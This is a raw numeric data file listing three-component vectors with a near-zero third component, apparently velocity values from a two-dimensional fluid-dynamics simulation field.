(0.151871300502 0.361005395993 0)
(0.154286180801 0.349093923755 0)
(0.154739779711 0.332290555444 0)
(0.152450313536 0.309946341156 0)
(0.146869077784 0.282272156168 0)
(0.137756653446 0.250134357402 0)
(0.125163538136 0.214746780146 0)
(0.10935233465 0.177408802334 0)
(0.0907431825571 0.13933578431 0)
(0.0698344373141 0.101490720993 0)
(0.047180896163 0.0647870464061 0)
(0.0226084445513 0.0283710885722 0)
(-0.000183497008403 -0.000950243696032 0)
(4.74837636156e-05 -0.00183023044558 0)
(0.000156900310384 -0.00156807099455 0)
(3.74202843232e-05 -0.00163697974986 0)
(-2.39457094254e-05 -0.00175635247575 0)
(-3.89597859642e-05 -0.00185869916206 0)
(-2.21409094198e-05 -0.00191979598346 0)
(-4.05381610434e-06 -0.00195315790325 0)
(1.1865135411e-05 -0.00273525653531 0)
(1.02394859463e-05 -0.00292128018932 0)
(-2.41327505928e-05 -0.00295837898305 0)
(-5.39098307234e-05 -0.00299812433089 0)
(-7.62275607559e-05 -0.00302528900863 0)
(-0.000100715464957 -0.00303633158333 0)
(-0.000125451014821 -0.00304003316988 0)
(-0.000165778873193 -0.00302815242322 0)
(-0.000227428923226 -0.00289290062046 0)
(-0.000286013623555 -0.00283233265223 0)
(-0.00033999331121 -0.00271553163957 0)
(-0.000374554771454 -0.00259632936328 0)
(-0.000375534049459 -0.00260628186361 0)
(-0.000354540215648 -0.0026028978939 0)
(-0.0003238800604 -0.0025909885561 0)
(-0.000296578133611 -0.00255419289452 0)
(-0.000265200693693 -0.00249614692395 0)
(-0.000242122265701 -0.00246834249841 0)
(-0.000217143327554 -0.00235330936706 0)
(-0.000193181840659 -0.00229836921276 0)
(-0.000161946651369 -0.00217225252065 0)
(-0.000132631379665 -0.00208423968872 0)
(-9.47577513458e-05 -0.0020102909697 0)
(-4.34859080119e-05 -0.00194206384655 0)
(1.2521326084e-05 -0.00189110096579 0)
(6.86747722244e-05 -0.00183018207157 0)
(0.000125603054532 -0.00175863628293 0)
(0.000189166318151 -0.00172564113354 0)
(0.000255785812281 -0.00168462746738 0)
(0.000329019368393 -0.00166111113762 0)
(0.000405012969025 -0.00162061321212 0)
(0.000495598520542 -0.00160659920829 0)
(0.000602034127295 -0.00159438268805 0)
(0.000738436759581 -0.0015818684099 0)
(0.000927457132798 -0.00158312302412 0)
(0.00119938843327 -0.00161153232297 -2.70749889204e-29)
(0.00154786923055 -0.00173087337577 0)
(0.00195171333295 -0.00309125341862 0)
(0.00438516885789 -0.112587552702 0)
(-0.00028620527678 -0.00246690479599 0)
(0.0128987774415 0.18717057577 0)
(0.0305992038625 0.319619290053 0)
(0.0455067133921 0.383084055826 0)
(0.0556773416145 0.410196339288 0)
(0.0639133020283 0.419738957698 0)
(0.0705450470629 0.421533393698 0)
(0.0765329233524 0.420272061122 0)
(0.0822371476131 0.417985362713 0)
(0.0878523802962 0.415431017871 0)
(0.0934416211507 0.412833092852 0)
(0.0990141041882 0.410212931008 0)
(0.104556446072 0.407524059881 0)
(0.110045655086 0.40470072267 0)
(0.115457759168 0.401671578152 0)
(0.120759917986 0.398358050216 0)
(0.125922634413 0.39467320686 0)
(0.130895408376 0.390503311711 0)
(0.135633294963 0.385706328548 0)
(0.140043973698 0.380057375997 0)
(0.144031416662 0.373171720148 0)
(0.147341988597 0.363834813431 0)
(0.149297890144 0.350243841113 0)
(0.148983684009 0.33092708414 0)
(0.145577785956 0.305400300018 0)
(0.138575985591 0.274179848758 0)
(0.127833244659 0.238449437444 0)
(0.113510314435 0.199676951717 0)
(0.0959629419733 0.15932518836 0)
(0.0756878258689 0.118663343887 0)
(0.053169794371 0.078548303641 0)
(0.028800873684 0.0405245468295 0)
(0.000202241579293 1.6890644602e-05 0)
(-0.000215434129256 -0.00136156112655 0)
(-2.19007434871e-05 -0.00156104028949 0)
(4.58630094955e-06 -0.0016171690699 0)
(-4.63470441942e-05 -0.00169897097113 0)
(-7.94426033714e-05 -0.00178571490613 0)
(-7.44831882833e-05 -0.0018580256427 0)
(-4.96804538161e-05 -0.00190341284018 3.190142293e-29)
(-1.8818692557e-05 -0.00191551890135 0)
(1.1670482041e-05 -0.00271381399464 0)
(-8.70654021576e-06 -0.00291659117204 0)
(-6.47904818108e-05 -0.0029982032061 0)
(-9.51864054865e-05 -0.00302168000076 0)
(-0.000109863927307 -0.0030472267705 0)
(-0.00012113564953 -0.00306200179772 0)
(-0.000133613327488 -0.00306551008669 0)
(-0.000148855035051 -0.00306034725916 0)
(-0.000202102803205 -0.00299645799305 0)
(-0.000255796566218 -0.00285532045723 0)
(-0.000294924533496 -0.00279623742005 0)
(-0.000323563325476 -0.00264556888136 0)
(-0.000372768502171 -0.00256809296044 0)
(-0.000386111391288 -0.0025559968042 0)
(-0.000347361607591 -0.0025482917879 0)
(-0.000306419914127 -0.00252356720615 0)
(-0.000261920479942 -0.00247055619661 0)
(-0.000219271102501 -0.00240786761595 0)
(-0.000183134630979 -0.00236034494984 0)
(-0.000146764852665 -0.00223862513005 0)
(-0.00011323290902 -0.00215593104084 0)
(-7.82099886662e-05 -0.00203679722133 0)
(-3.4668692957e-05 -0.00195083740587 0)
(1.95723282693e-05 -0.0018880360694 0)
(7.56249643282e-05 -0.00183096378009 0)
(0.000131882507378 -0.00176028274883 0)
(0.000191132613722 -0.00171578596735 0)
(0.000248943641522 -0.00165339349135 0)
(0.000313230211839 -0.00162560918978 0)
(0.000376748611588 -0.00158219089093 0)
(0.000448985632475 -0.00155557463533 0)
(0.000524721961647 -0.0015153390427 0)
(0.000621171138158 -0.00148066186821 0)
(0.000744727474233 -0.00142122186093 0)
(0.000916931850374 -0.00135459950802 0)
(0.00119510143941 -0.00129569531181 0)
(0.00165652130315 -0.00116238405433 0)
(0.00113405023273 -0.00157177877091 0)
(0.0109084139222 -0.109965903155 0)
(0.000319530348859 -0.00121578548919 0)
(0.0187644519686 0.203340087626 0)
(0.0329929053634 0.33476912585 0)
(0.0471275215706 0.394862273759 0)
(0.0560980664211 0.41896900039 0)
(0.0633379573446 0.426651252745 0)
(0.0692609693228 0.427519913432 0)
(0.0747646138107 0.425879565561 0)
(0.0801237141957 0.423475667461 0)
(0.0854787767793 0.420902688921 0)
(0.0908559773381 0.418306515361 0)
(0.0962444263277 0.415676588837 0)
(0.10161960223 0.412954843254 0)
(0.106951806559 0.410071362591 0)
(0.112213456539 0.406952015722 0)
(0.117367465891 0.403514254685 0)
(0.122383490919 0.399665071819 0)
(0.12720415183 0.395278826238 0)
(0.131785126866 0.390197402824 0)
(0.136019201955 0.38416072708 0)
(0.139808373729 0.376711827838 0)
(0.142847489769 0.366291576122 0)
(0.144304904919 0.35075231642 0)
(0.143144338699 0.328577259405 0)
(0.13852452823 0.29953682121 0)
(0.130012059736 0.264520869697 0)
(0.117577261562 0.225065189331 0)
(0.101510369331 0.18290290319 0)
(0.0822949160394 0.139644355033 0)
(0.0605451544232 0.0965028794134 0)
(0.0363838032318 0.053825602922 0)
(0.00672955632809 0.0135028788559 0)
(-0.00023523148172 -0.00112043192616 0)
(0.000212860358839 -0.00141600008286 0)
(8.12438890179e-06 -0.00156529911981 0)
(-4.47663726657e-05 -0.00166018342652 0)
(-8.80338561445e-05 -0.00174048251454 0)
(-0.000107774027912 -0.00178444430752 0)
(-8.87879737191e-05 -0.00182267648726 0)
(-5.68885458386e-05 -0.00187318967791 -2.85437728683e-29)
(-2.34684087905e-05 -0.00188093237318 0)
(-2.52618876881e-06 -0.00274603849391 0)
(-4.0882813559e-05 -0.00309537610646 0)
(-9.57906178397e-05 -0.00308942258144 0)
(-0.000124163085635 -0.00306733588575 0)
(-0.000131761271047 -0.00307038622474 0)
(-0.000127719271122 -0.0030786282903 0)
(-0.000124843990509 -0.0030834598922 0)
(-0.00012538472672 -0.00307920085637 0)
(-0.000144996275165 -0.00306610198034 0)
(-0.000204882766048 -0.00287990440802 0)
(-0.000272254428087 -0.00278738163522 0)
(-0.000306328215853 -0.00272768409389 0)
(-0.000353907849702 -0.00278680356948 0)
(-0.000350989442765 -0.00250792509797 0)
(-0.000356633726481 -0.00248835316653 0)
(-0.000317481217123 -0.00245227512326 0)
(-0.000258924536679 -0.00242136840283 0)
(-0.000205818762757 -0.002374169273 0)
(-0.00015229770338 -0.00229430927923 0)
(-0.000102708998815 -0.00222797863986 0)
(-6.2768752239e-05 -0.00210390837469 0)
(-2.26484586132e-05 -0.00201277362857 0)
(2.58228078609e-05 -0.00190605125145 0)
(8.04023296353e-05 -0.00183096189551 0)
(0.000136994492516 -0.00178061163356 0)
(0.000193099439912 -0.00171402147759 0)
(0.000248028717017 -0.00164314202785 0)
(0.000305643486527 -0.00160368682568 0)
(0.000360091381462 -0.00155781627729 0)
(0.000417813521048 -0.00152766769444 3.29478601649e-29)
(0.000471390027916 -0.00147618894002 0)
(0.000534740884169 -0.00144537586238 0)
(0.000606518176692 -0.00139031289849 0)
(0.000681804557588 -0.00128774013057 0)
(0.000803787546576 -0.00117762351015 0)
(0.000982707293546 -0.000982096652843 0)
(0.00141344170979 -0.000665675278445 0)
(0.000442379472646 -0.000411134915423 -2.50258896901e-29)
(0.0142948476674 -0.101981172143 2.20489149416e-28)
(0.000871549284505 -0.000690223615075 0)
(0.0237943925945 0.21938504896 0)
(0.0351626390596 0.348929998532 0)
(0.0481642043181 0.405338190569 0)
(0.0560121320335 0.426635958483 0)
(0.0623636307156 0.432752198737 0)
(0.0676821379426 0.432949330643 0)
(0.0727925549567 0.431105101638 0)
(0.0778723033236 0.428688757536 0)
(0.0830119586356 0.426155963657 0)
(0.0882072824479 0.423594228117 0)
(0.093432370393 0.420973240796 0)
(0.0986552056057 0.418229849601 0)
(0.103841848697 0.415293174782 0)
(0.108962701447 0.412087556679 0)
(0.113977183237 0.408526891636 0)
(0.118855335667 0.404511745135 0)
(0.123532012398 0.39990346647 0)
(0.127965706038 0.3945262596 0)
(0.132030613832 0.388079595114 0)
(0.135630683344 0.380021349099 0)
(0.138396094321 0.368353001634 0)
(0.139309816133 0.350556935999 0)
(0.137217919234 0.325150116785 0)
(0.131284753656 0.292260461526 0)
(0.121172911007 0.253215550065 0)
(0.106979426065 0.209929278696 0)
(0.0891351041053 0.164404664574 0)
(0.0683067037378 0.118409877004 0)
(0.0452810727305 0.0732633857177 0)
(0.0191039098984 0.0287537696485 0)
(-0.000347328572596 -0.00108043235073 0)
(-2.07243386919e-05 -0.00175799502072 0)
(5.49587859251e-06 -0.00158221696005 0)
(-4.83162473324e-05 -0.00163170971831 0)
(-7.85898679733e-05 -0.00169466706263 0)
(-9.42071728845e-05 -0.00174832203027 -2.36294220596e-29)
(-9.87309615559e-05 -0.00177005892537 0)
(-7.93534426153e-05 -0.00174540658185 0)
(-4.52931666964e-05 -0.00182690053503 0)
(-1.31697220666e-05 -0.00178070746895 0)
(-3.39468976045e-05 -0.00280083329031 0)
(-8.31919751449e-05 -0.00313386487802 0)
(-0.000111407289723 -0.00313944866156 0)
(-0.000136473045418 -0.00310361165598 0)
(-0.000129755991631 -0.00307894719615 0)
(-0.000109000907657 -0.00308031050297 0)
(-9.18697550073e-05 -0.00308520045551 0)
(-8.37935665546e-05 -0.00308668040061 -1.42100964288e-29)
(-8.18918830435e-05 -0.00307506577476 1.39135332316e-29)
(-0.000126567375987 -0.00305239860071 0)
(-0.000220361923119 -0.00285428795891 0)
(-0.000306914426515 -0.00269999537297 0)
(-0.000323324895049 -0.00269943911363 0)
(-0.000313010596569 -0.00264653637605 0)
(-0.000319951340541 -0.00253295669976 0)
(-0.000295002790342 -0.00240135613733 0)
(-0.000252086224759 -0.00233819516065 0)
(-0.000194992476065 -0.00232659774047 0)
(-0.000125853919223 -0.00224493640158 0)
(-6.37264032144e-05 -0.00216353321342 0)
(-1.352431361e-05 -0.0020817231168 0)
(3.52636381889e-05 -0.00195500504536 0)
(8.60672948815e-05 -0.00184618470735 0)
(0.0001394671023 -0.00177655686369 0)
(0.000194881140584 -0.00171757808169 0)
(0.00024941419709 -0.00164770991087 0)
(0.000306132316141 -0.00160096250552 0)
(0.000355725886376 -0.00153989672593 0)
(0.000407483943442 -0.00151262454184 0)
(0.00045274054312 -0.00147092543478 -3.25040759492e-29)
(0.000499915558741 -0.00144120514726 0)
(0.000538162479456 -0.00139418058405 0)
(0.0005672953607 -0.00132675243578 0)
(0.000591035418321 -0.00124007752141 0)
(0.000614815230783 -0.00108919593443 0)
(0.000651424328361 -0.000813181174829 0)
(0.00091185273771 -0.000353818953807 0)
(-0.000138942033559 0.000383213464826 0)
(0.0156117761236 -0.0904310069645 0)
(0.0013133340147 -0.000232523661733 0)
(0.0267153881711 0.234962744708 0)
(0.0364617040115 0.362085026355 0)
(0.0482444648518 0.414576638442 0)
(0.0551782925283 0.433325303563 0)
(0.0608600281401 0.438190319621 0)
(0.0657353309161 0.437947994552 0)
(0.0705722313717 0.436041752289 0)
(0.0754544166177 0.433688620626 0)
(0.0804325255349 0.431233721547 0)
(0.0854817321922 0.428725206432 0)
(0.090567862634 0.426123148192 0)
(0.0956558125919 0.42336405937 0)
(0.100710385731 0.420378093004 0)
(0.105701822985 0.417088520519 0)
(0.110587016208 0.413405632997 0)
(0.115337813559 0.409222769048 0)
(0.119880226184 0.404386945164 0)
(0.124178457535 0.398702697083 0)
(0.128083285002 0.391823090374 0)
(0.131506498028 0.383105709289 0)
(0.133996782487 0.369993655687 0)
(0.134315511634 0.349589631095 0)
(0.131202394048 0.320552253334 0)
(0.123858852631 0.283480388913 0)
(0.112069150297 0.240195450106 0)
(0.0960642460291 0.192996996222 0)
(0.0764023221101 0.144104464204 0)
(0.0537792551904 0.0953350238131 0)
(0.028772216048 0.0483523091118 0)
(0.000103432060903 8.11459659196e-05 0)
(-0.000345511502919 -0.00155320139269 0)
(-9.1760430166e-05 -0.00159114908577 0)
(-5.65974309221e-05 -0.0015993681773 0)
(-7.08466926189e-05 -0.00165204995329 0)
(-8.05521611961e-05 -0.00170382014911 -2.15705134351e-29)
(-7.82574170661e-05 -0.00174449908827 2.2390675542e-29)
(-6.92400112128e-05 -0.00177205060841 0)
(-5.75649075465e-05 -0.00173150271695 0)
(-3.01150295126e-05 -0.00177899052972 0)
(-3.1933010663e-06 -0.00180178905319 0)
(-7.39391152028e-05 -0.00284022355444 0)
(-0.000154951381195 -0.00310234835594 0)
(-0.000164612643796 -0.00315618167741 0)
(-0.000159061028269 -0.00309658773092 0)
(-0.000115977397683 -0.00305349993474 0)
(-7.31948127678e-05 -0.00305568827796 0)
(-4.31482575997e-05 -0.00307278813328 0)
(-2.91410857681e-05 -0.00308432379007 0)
(-2.98709300673e-05 -0.00308733998779 0)
(-4.62625958973e-05 -0.00307589305759 0)
(-0.000110621002086 -0.00303138571112 0)
(-0.000226460482132 -0.00282379004441 0)
(-0.000302137277769 -0.00260289968632 0)
(-0.000311452349263 -0.00258433231274 0)
(-0.000271443168895 -0.00252477213871 0)
(-0.000243129525516 -0.00242467128782 0)
(-0.000214793128233 -0.00230590038231 0)
(-0.000164782355441 -0.00223319126402 0)
(-0.000100529964307 -0.00214384014941 0)
(-3.85334914471e-05 -0.00211676585305 0)
(3.24155825261e-05 -0.00201616995614 0)
(9.34347889408e-05 -0.00190772466982 0)
(0.000141371631065 -0.00179716016367 0)
(0.000193634588163 -0.0017210213968 0)
(0.000250869843443 -0.00166819868538 0)
(0.000306418786903 -0.00160199143063 4.13820459432e-29)
(0.000358222367293 -0.00153502362012 0)
(0.000411045674187 -0.00150287671043 0)
(0.000454252717784 -0.00146302054627 0)
(0.000500739717314 -0.00144181885072 0)
(0.000531722110842 -0.00139608348977 0)
(0.000552605404677 -0.00137342727942 0)
(0.000537531615062 -0.00133098935829 0)
(0.00048951542676 -0.00126667382815 0)
(0.000391671836604 -0.00113142752074 0)
(0.00024134577783 -0.000863821542378 0)
(0.000144824308479 -0.000307741376607 0)
(-0.000717871151758 0.00080678997819 0)
(0.0151576723618 -0.0766282958439 0)
(0.00163039590955 0.000169568087548 0)
(0.0270575731091 0.24996176845 -8.75297221817e-29)
(0.0364537833134 0.374351131595 5.84155532194e-29)
(0.0471064146179 0.422798040122 0)
(0.0534257508647 0.439285700648 0)
(0.0587458715703 0.443189319886 0)
(0.0633857181377 0.442683674339 0)
(0.0680872053112 0.440803727112 0)
(0.0728616940982 0.438549971519 0)
(0.0777353701299 0.436184497576 0)
(0.0826754245468 0.433731585276 0)
(0.087647493136 0.431148516133 0)
(0.0926182988518 0.428373846407 0)
(0.0975546772822 0.42533924496 0)
(0.102428624253 0.421966416324 0)
(0.10719560948 0.418161458018 0)
(0.111830756135 0.413809160011 0)
(0.116249919388 0.408740711211 0)
(0.120426658799 0.402738506372 0)
(0.124182056895 0.395402647154 0)
(0.127444163719 0.385972738657 0)
(0.129658637807 0.371184925152 0)
(0.129323998027 0.347776766364 0)
(0.125095189219 0.314689447269 0)
(0.116247730385 0.273114576138 0)
(0.102717143047 0.225414237812 0)
(0.0849032813897 0.17426521458 0)
(0.0635488474134 0.122036343609 0)
(0.0391285351322 0.0705948749224 0)
(0.0091137809539 0.0219822357274 0)
(-0.000342512435122 -0.00106562392504 0)
(0.000172923089239 -0.00147833467642 0)
(-8.42669640379e-06 -0.00156800328647 0)
(-4.33002001425e-05 -0.00161267642033 -1.93849479047e-29)
(-6.50940595526e-05 -0.00166264887032 0)
(-7.06576718273e-05 -0.00170521515986 2.08350346495e-29)
(-6.46105487514e-05 -0.00173865657192 0)
(-5.10214127543e-05 -0.0017642625968 0)
(-4.01142469955e-05 -0.00174664514825 0)
(-2.61200969065e-05 -0.00176767778888 0)
(-7.03837184581e-06 -0.00180259917986 0)
(-0.00011115872737 -0.00301485243014 0)
(-0.000236349390516 -0.00309226500088 0)
(-0.000242753241433 -0.00316274425443 0)
(-0.000176577419415 -0.00303670264762 0)
(-9.63180838756e-05 -0.00298583685139 0)
(-3.91846371287e-05 -0.00300654959805 0)
(1.30240543972e-06 -0.00304300985591 0)
(2.34731864695e-05 -0.00307795164359 0)
(2.62961082237e-05 -0.00309502025606 0)
(1.41264680367e-05 -0.0030962671634 0)
(-1.37424464293e-05 -0.00307265703659 0)
(-8.84136948504e-05 -0.00299209428208 0)
(-0.000204904936959 -0.00277313415546 0)
(-0.000268683189054 -0.00246412043587 0)
(-0.000265670618056 -0.00240879360317 0)
(-0.000221252626159 -0.00237234632728 0)
(-0.000169381277627 -0.00228863224192 0)
(-0.000116793965826 -0.00220094672323 0)
(-6.61444185387e-05 -0.00211021169458 0)
(-5.15525574258e-06 -0.00201977049978 0)
(6.64861067611e-05 -0.00191891063672 0)
(0.0001360077775 -0.00185612214152 0)
(0.000191065727319 -0.0017468457542 0)
(0.000243667716692 -0.00166687690175 0)
(0.000302249551881 -0.0016056162257 0)
(0.000360018613425 -0.00153927852232 -4.10675884552e-29)
(0.000417308784423 -0.00149512725127 0)
(0.000463401642943 -0.0014448574174 0)
(0.000518117752449 -0.00143321889296 0)
(0.000560333804237 -0.00139096623112 0)
(0.000583904512166 -0.00136537431756 0)
(0.000586292457867 -0.00137706230155 0)
(0.000546640013747 -0.00138697909833 0)
(0.000433270151542 -0.00137400580182 0)
(0.000215667807938 -0.0013479083605 0)
(-0.000167817773396 -0.00118473401288 0)
(-0.000797783877453 -0.000711912831656 0)
(-0.00136728705367 0.000718801967191 0)
(0.0126523725602 -0.0605357741589 0)
(0.00182212690096 0.000312856552351 0)
(0.0242214431813 0.263991899427 0)
(0.0347684968859 0.385989021723 0)
(0.0446280881784 0.430435557132 0)
(0.0506982054592 0.444901294584 0)
(0.0560205296113 0.448039201559 0)
(0.0606584531849 0.447351839364 0)
(0.0653629068129 0.445514027732 0)
(0.0701138186895 0.443348599688 0)
(0.074933886614 0.441055403575 0)
(0.0797964209349 0.43864362708 0)
(0.0846753706027 0.436069971918 0)
(0.0895440789649 0.433274545555 0)
(0.0943745492983 0.430189294814 0)
(0.0991421505721 0.426732837709 0)
(0.103802026994 0.422805938123 0)
(0.108333865078 0.418282970821 0)
(0.112641789692 0.412977727931 0)
(0.116713094051 0.406647388154 0)
(0.12033111528 0.398832101309 0)
(0.123451751267 0.388632861384 0)
(0.125390148954 0.37189412974 0)
(0.124335152055 0.345038558015 0)
(0.118890831388 0.307467105693 0)
(0.10844715382 0.261090047983 0)
(0.0931223533098 0.20883624991 0)
(0.0735069985096 0.153723873615 0)
(0.0503965851085 0.0982775138967 0)
(0.0237224247242 0.0449090563628 0)
(-0.000204164629378 -0.000492928503873 0)
(-0.000218843356622 -0.00185958321523 0)
(-2.1896164676e-05 -0.00161060678127 0)
(-3.70061736013e-05 -0.00161983631876 0)
(-5.13655883062e-05 -0.00163743437726 1.90185400309e-29)
(-6.29570959319e-05 -0.00167158065336 1.90776040559e-29)
(-6.46155771307e-05 -0.00170304206416 0)
(-5.82307284368e-05 -0.00172888680844 0)
(-4.54519769467e-05 -0.00174859559378 0)
(-3.33064028958e-05 -0.00173184945689 0)
(-2.58030605064e-05 -0.00175379299427 0)
(-1.10268064402e-05 -0.00178407020998 0)
(-9.168159418e-05 -0.00336399977644 0)
(-0.000229998717399 -0.00321150385727 0)
(-0.000240713722925 -0.00311673731834 0)
(-0.000145036383606 -0.00288019279132 0)
(-7.57804865604e-05 -0.00287498568667 0)
(-2.56719953681e-05 -0.00292465557431 0)
(2.08357995116e-05 -0.0029983818714 0)
(5.82045042322e-05 -0.00305779256158 0)
(7.45798338902e-05 -0.00310202923026 0)
(6.98362717324e-05 -0.0031154682208 0)
(5.04802721097e-05 -0.0031020647787 0)
(1.43394109607e-05 -0.00305382791516 0)
(-6.53514036026e-05 -0.00289691830595 0)
(-0.000169630486173 -0.00266823815795 0)
(-0.000233089919635 -0.00237348715493 0)
(-0.000221487449477 -0.00229144967837 0)
(-0.000146393439956 -0.00219379214613 0)
(-8.33919054419e-05 -0.00215003184663 0)
(-2.06854673847e-05 -0.00206296465633 0)
(4.37762493889e-05 -0.00198221802027 0)
(0.000105832791576 -0.00187176778998 0)
(0.000170563740522 -0.00177859114458 0)
(0.000234179883932 -0.00169366712043 -5.06564765019e-29)
(0.000291546719352 -0.00161103312466 0)
(0.000352801304871 -0.00154706591147 0)
(0.000416096745008 -0.00148774612387 0)
(0.000472417947686 -0.00143054164944 0)
(0.000536441750323 -0.00141361191448 0)
(0.000589841220681 -0.00136343976439 0)
(0.00063316619242 -0.001333856626 0)
(0.000669159822981 -0.00136419419383 0)
(0.000666326440491 -0.0013941799443 0)
(0.000623755394327 -0.00145618563901 0)
(0.000498014545934 -0.00156602393843 0)
(0.000209543396755 -0.00172442077013 0)
(-0.0003660458772 -0.00188291400051 0)
(-0.00182201804014 -0.00204246659757 0)
(-0.00219898484866 -0.00215500895944 0)
(0.00847498680971 -0.0484077386558 0)
(0.0021576979177 -0.00254724302802 0)
(0.0175764768293 0.277072590347 0)
(0.0309933932084 0.397744015135 0)
(0.0408977799111 0.438235280201 0)
(0.047148480533 0.450684469854 0)
(0.0528169264217 0.453056433327 0)
(0.057663358046 0.45213956118 0)
(0.0624778938699 0.450279110847 0)
(0.0672627469033 0.448144727219 0)
(0.0720608128473 0.445881461926 0)
(0.0768642218512 0.443482968079 0)
(0.0816621603545 0.44090229596 0)
(0.0864381001019 0.438077745298 0)
(0.0911714882187 0.434938721132 0)
(0.0958419152889 0.431398377401 0)
(0.100405112293 0.427350563745 0)
(0.104846148592 0.422656893265 0)
(0.109055632208 0.417112268448 0)
(0.113039592996 0.410444832563 0)
(0.11653348247 0.402127668687 0)
(0.119536531701 0.391099079239 0)
(0.121198499234 0.372082982779 0)
(0.119345234118 0.341287775656 0)
(0.112578679777 0.29879043066 0)
(0.100451004615 0.247343383119 0)
(0.0833086385033 0.190430760954 0)
(0.0618960865428 0.131356919128 0)
(0.0366537534902 0.0729619025629 0)
(0.00660247436886 0.0183500838377 0)
(-0.000343187116828 -0.00121351982271 0)
(7.3801953209e-05 -0.00154317281156 0)
(-2.20344920778e-06 -0.00158905453767 0)
(-3.4037100637e-05 -0.00162485065755 0)
(-5.2077987422e-05 -0.00164697061615 0)
(-6.1641157817e-05 -0.00167347530848 -1.85628622023e-29)
(-6.21316686327e-05 -0.00169725259952 0)
(-5.60890646688e-05 -0.00171685855404 -1.87210529233e-29)
(-4.3277602233e-05 -0.00173055642709 0)
(-3.20379900336e-05 -0.00172121676662 0)
(-2.72313649246e-05 -0.00174349609904 0)
(-1.23473698063e-05 -0.00175215993891 0)
(-2.61020380475e-05 -0.00343896472334 0)
(-0.000118651968984 -0.00334307750408 0)
(-0.000155736501402 -0.00299167592922 0)
(-0.000110882071689 -0.00283353409281 0)
(-5.53296406501e-05 -0.00285303917502 0)
(-6.67182229342e-06 -0.00289295474892 0)
(3.64060344151e-05 -0.00293133826477 0)
(7.51153116577e-05 -0.003015420408 0)
(0.00010502725037 -0.00309108859358 0)
(0.000115196608207 -0.00313281111641 0)
(0.000101688294381 -0.00313251865505 0)
(7.46376560079e-05 -0.00308983968883 0)
(2.7737156564e-05 -0.00300241441488 0)
(-6.3762077558e-05 -0.00273312265888 0)
(-0.000155846850244 -0.00258366540279 0)
(-0.000151766069531 -0.00225438989394 0)
(-0.000115455790208 -0.00212290840268 0)
(-6.16356753295e-05 -0.00207080070675 0)
(1.4750677216e-05 -0.00198445014891 0)
(8.68719875436e-05 -0.0019043660519 0)
(0.000149321368874 -0.00180343993944 0)
(0.000209387697007 -0.00172261744736 0)
(0.00027316139238 -0.00163150641312 5.07302305863e-29)
(0.000336837754001 -0.00155085562718 0)
(0.000404346166901 -0.00148454705964 0)
(0.000469574933019 -0.00141482129715 0)
(0.000540575777348 -0.00138022628606 0)
(0.000605738138817 -0.00132620952339 0)
(0.000671044760127 -0.0012942148643 0)
(0.000733470992173 -0.00130629547595 0)
(0.0007767816171 -0.00133323073558 0)
(0.000809014462359 -0.00140155021064 0)
(0.000803963313189 -0.00151398853078 0)
(0.000747640261528 -0.00172190703719 0)
(0.000569905131451 -0.00204359345091 0)
(0.000152836107093 -0.00259914214383 0)
(-0.000784926383273 -0.00363112684828 0)
(-0.00341147294239 -0.00588988950201 0)
(0.000785634377444 -0.0136284174925 0)
(0.00316747106359 -0.00631388057548 0)
(0.0064760257444 0.292538510614 0)
(0.0250612327247 0.410457245259 0)
(0.0364883907521 0.446942289773 0)
(0.043284465873 0.457092840604 0)
(0.0494536600926 0.458470646483 0)
(0.0546032452728 0.457157337079 0)
(0.0595598801445 0.455150454094 0)
(0.0643864229507 0.452961838412 0)
(0.0691623766988 0.450673872138 0)
(0.0739051310752 0.448256032546 0)
(0.0786216640892 0.445650661062 0)
(0.083306380446 0.442789092821 0)
(0.0879468632776 0.439594509069 0)
(0.0925265930515 0.435971849989 0)
(0.0970025157608 0.431806292162 0)
(0.101365145523 0.42694402991 0)
(0.105489764715 0.421159844617 0)
(0.10940653433 0.414148092709 0)
(0.112790551043 0.405307976116 0)
(0.115704603509 0.393386814233 0)
(0.117089049457 0.371705275 0)
(0.114345004673 0.33642766535 0)
(0.106139504657 0.288562994372 0)
(0.0922482938459 0.231811737173 0)
(0.0732890997251 0.170152361618 0)
(0.0499588113159 0.107223437838 0)
(0.0220233297445 0.0467125128871 0)
(-0.000220330091706 -0.000575411182769 0)
(-0.000160862183476 -0.00163629966748 0)
(-6.95306313425e-05 -0.00159793663164 0)
(-6.27894739726e-05 -0.00162028304442 0)
(-6.29711749752e-05 -0.0016370265299 0)
(-6.55007669106e-05 -0.00165417490655 0)
(-6.72627455616e-05 -0.0016725694042 0)
(-6.42881690253e-05 -0.0016898230827 0)
(-5.78736569122e-05 -0.00170343313611 1.83654171699e-29)
(-4.58054697682e-05 -0.0017115634078 0)
(-3.45372891802e-05 -0.00171441870487 -1.82299828674e-29)
(-2.79985492206e-05 -0.00173202136294 0)
(-1.21084850049e-05 -0.00172806353055 0)
(1.5566431103e-05 -0.00341314665541 0)
(-1.46517643361e-06 -0.00341233720235 0)
(-9.06145954449e-05 -0.00304908682495 0)
(-9.68008566933e-05 -0.00278632105649 0)
(-1.82820438626e-05 -0.00280135387481 0)
(4.4969591101e-05 -0.00285611012941 0)
(8.66328833614e-05 -0.00292172318278 0)
(0.000111041265237 -0.00298118237378 0)
(0.000128514222637 -0.00305200423158 0)
(0.000143444640622 -0.00313428730478 0)
(0.000141874868917 -0.00316100043834 0)
(0.00011855077312 -0.00312750274225 0)
(9.1565086868e-05 -0.00302676549482 0)
(4.27268793014e-05 -0.00288591712907 0)
(-1.93843246598e-05 -0.00248389327162 0)
(-6.91974932584e-05 -0.00220370621976 0)
(-7.43453651277e-05 -0.00214848024938 0)
(-1.21541648872e-05 -0.00199820709433 0)
(4.83815201019e-05 -0.00189133220654 0)
(0.000112907374204 -0.00183688933792 6.25420050502e-29)
(0.000185577918931 -0.00176175135078 0)
(0.000251039480935 -0.00166384245449 0)
(0.000311412464184 -0.00155699524761 0)
(0.000381931772885 -0.00148867799723 0)
(0.000454120466518 -0.00140700563071 0)
(0.000528811792893 -0.00134744795868 0)
(0.000603964831458 -0.00129540436254 0)
(0.000684619395279 -0.00125723572524 0)
(0.000762466771055 -0.00123514751767 0)
(0.000835875090876 -0.00123925915097 0)
(0.000917176427908 -0.00128543672739 0)
(0.000983161213372 -0.0013504482053 0)
(0.00106066354097 -0.00149247058655 0)
(0.00110847635143 -0.00170494080171 0)
(0.00119618251457 -0.00214076488554 0)
(0.00132074298287 -0.00285937758042 0)
(0.00164071731606 -0.0041166182122 0)
(0.00326120898457 -0.00671103796092 0)
(0.000439813512695 -0.0103922235625 0)
(-0.00530187519038 -0.00872323024507 0)
(0.000931761418484 0.309666437343 0)
(0.0191578975078 0.424320300271 0)
(0.0324604151249 0.456731672674 0)
(0.0398598504018 0.464210770264 0)
